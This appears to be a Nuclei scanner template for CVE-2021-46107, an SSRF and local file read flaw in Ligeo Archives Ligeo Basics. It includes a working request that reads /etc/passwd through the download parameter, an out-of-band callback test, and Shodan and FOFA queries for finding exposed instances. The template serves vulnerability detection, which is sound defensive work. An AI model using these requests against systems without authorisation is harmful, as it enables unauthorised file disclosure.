id: CVE-2021-46107 info: name: Ligeo Archives Ligeo Basics - Server Side Request Forgery author: ritikchaddha severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46107 cwe-id: CWE-918 epss-score: 0.01705 epss-percentile: 0.86389 cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: ligeo-archives product: ligeo_basics shodan-query: title:"Ligeo" fofa-query: title="Ligeo" tags: cve,cve2021,ligeo,ssrf,lfr http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=file:///etc/passwd HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" # digest: 4a0a00473045022019c4336bb4e75faefa6931e627923cf505d1f0ca85025caa89d4ba7daaf188da022100de8bba89f26f437b1feb440f48709f55be6901dc9fc7bc766f8e18d9d2ea8154:922c64590222798bb761d5b6d8e72950